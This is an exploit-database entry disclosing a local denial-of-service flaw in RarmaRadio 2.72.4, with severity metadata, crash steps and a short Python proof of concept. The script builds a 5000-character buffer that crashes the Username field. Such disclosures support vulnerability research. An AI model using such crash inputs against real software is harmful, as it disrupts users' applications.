RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)

vendor:

RarmaRadio

by:

chuyreds

7.5

CVSS

HIGH

Denial of Service (DoS) Local

CWE

Product Name: RarmaRadio

Affected Version From: 2.72.4

Affected Version To: 2.72.4

Patch Exists: YES

Related CWE: N/A

CPE: a:raimersoft:rarmaradio

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro x64 es

2020

RarmaRadio 2.72.4 – ‘username’ Denial of Service (PoC)

RarmaRadio 2.72.4 is vulnerable to a denial of service attack when a maliciously crafted username is used. By running the python code 'rarmaradio_username.py', a text file containing a buffer of 5000 'A' characters is created. When this text file is copied to the clipboard and pasted into the 'Username' field in the 'Network' settings, the application will crash.

Mitigation:

Upgrade to the latest version of RarmaRadio.

Source

Exploit-DB raw data:

# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
# Tested Version: 2.72.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: rarmaradio_username.py
#2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit" > "Settings" > "Network"
#5.- In "Username" field paste Clipboard
#6.- Select "OK"
#7.- Crashed
buffer = "\x41" * 5000
f = open ("RarmaRadio2.72.4_username.txt", "w")
f.write(buffer)
f.close()